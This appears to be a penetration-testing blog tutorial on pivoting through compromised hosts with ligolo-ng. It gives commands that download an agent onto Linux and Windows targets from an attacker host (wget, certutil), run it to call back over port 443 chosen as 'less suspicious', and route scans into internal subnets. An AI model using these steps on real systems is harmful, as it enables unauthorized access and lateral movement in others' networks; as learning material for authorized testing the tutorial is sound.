# Unlock Hidden Networks: Tunneling and Pivoting. Hello folks, Ever get that initial shell on a target, see another network segment you can't reach, and dread the hassle of setting up a pivot? What if I told you there's a better way? Before coming across this tool I used to perform pivoting using proxychains which actually is a simple tool for specific, application-level TCP tunneling tasks especially when the proxy is already provided but it has it's limitations like protocol limitation and tool compatibility as it breaks many tools and only works with tools that are dynamically linked and support SOCKS proxies. This is where ligolo-ng comes in as it provides a full,native and reliable network pivot and transforms your attack machine into a node on the remote network,unlocking your entire toolkit. Pivoting (accessing new networks through a compromised machine) can be confusing. Ligolo-ng is a fantastic tool that makes this process simple and fast by creating a virtual network interface on your attacker machine. What You Need to Know First: Agent: A small program you run on the target machine you compromise. Proxy: The main program you run on your own attacker machine to manage connections. Tunnel: The encrypted connection that routes your traffic through the compromised host. ## Step 1: Download and Setup 1.Download the Tools: Go to the [Ligolo-ng] page and download two files: The Proxy for your attacker machine (likely Linux). The Agent for your target machine (Linux or Windows). 2.Prepare Your Attacker Machine: Create a directory for the files (e.g., mkdir /opt/ligolo and cd into it). Use wget to download the files directly, or manually transfer them. Unpack the files with tar -xvf [filename] for Linux files or unzip for Windows. Rename the files to something simple like lin-proxy, lin-agent, and win-agent.exe to stay organized. ## Step 2: Start the Ligolo-ng Server (Proxy) 1.Create the Virtual Network Interface: Run these two commands on your attacker machine once to set up the tunnel device: ```bash sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ``` 2.Start the Proxy Listener: Run the proxy tool to listen for incoming connections from your agents. I use port 443 as it's common and less suspicious. ```bash ./lin-proxy -selfcert -laddr 0.0.0.0:443 ``` -selfcert tells it to generate its own certificates for encryption. ## Step 3: Connect the First Agent (Linux Target) 1.Transfer the Agent: On your attacker machine, start a web server in the directory where your lin-agent file is: ```bash sudo python3 -m http.server 80 ``` On the Linux target machine, download the agent: ```bash wget http://<YOUR-ATTACKER-IP>/lin-agent chmod +x lin-agent # Make it executable ``` 2.Run the Agent: On the target machine, run the agent to call back to your proxy server: ```bash ./lin-agent -connect <YOUR-ATTACKER-IP>:443 -ignore-cert ``` -ignore-cert tells it not to worry about the self-signed certificate we used. 3.Check for Connection: Look back at your proxy window. You should see a message that a new session was created. Type session to list it and start to activate the tunnel. ## Step 4: Discover Networks and Pivot 1.Find Other Networks: On the compromised Linux target, look for signs of other networks it can talk to. ```bash ip route netstat -an ifconfig ``` You might find a network like 192.168.110.0/24. 2.Add the Route: On your attacker machine, tell it to send traffic for that newly discovered network through the Ligolo tunnel interface: ```bash sudo ip route add 192.168.110.0/24 dev ligolo ``` That's it! You can now run tools like nmap or ping directly on your attacker machine to target hosts on the 192.168.110.0/24 network (e.g., nmap -sV 192.168.110.50). The traffic will be automatically routed through the compromised machine. ## Step 5: Pivot Again (To a Windows Machine) Let's say you hack a Windows machine (192.168.110.50) on that new network and find it talks to another network (192.168.210.0/24). You just repeat the process. 1.Discover More Networks: On the Windows machine, check for other connections: ```bash! netstat -an | findstr "192.168." ``` 2.Transfer the Windows Agent: Host the win-agent.exe file on your web server. On the Windows target, download it with: ```bash! certutil.exe -urlcache -split -f "http://<YOUR-ATTACKER-IP>/win-agent.exe" ``` 3.Run the Windows Agent: On the Windows target, run: ```bash! win-agent.exe -connect <YOUR-ATTACKER-IP>:443 -ignore-cert ``` 4.Manage the New Tunnel: Back in your Ligolo-ng proxy window, type session. You will now see two sessions. Select the new Windows one and type start. 5.Add the New Route: On your attacker machine, add the route for the brand new network you found: ```bash! sudo ip route add 192.168.210.0/24 dev ligolo ``` Now you can access hosts on the 192.168.210.0/24 network from your own machine! You can continue this process over and over to pivot deep into a network. ### Summary 1.Setup the proxy and agents. 2.Start the proxy listener. 3.Run an agent on a compromised host. 4.Discover new networks from that host. 5.Add a route on your machine to the new network via ligolo. 6.Repeat from step 3 when you find a new machine that can access even more networks [ligolo-ng]: https://github.com/nicocha30/ligolo-ng That's all I got for now!! Regards, dr3amy.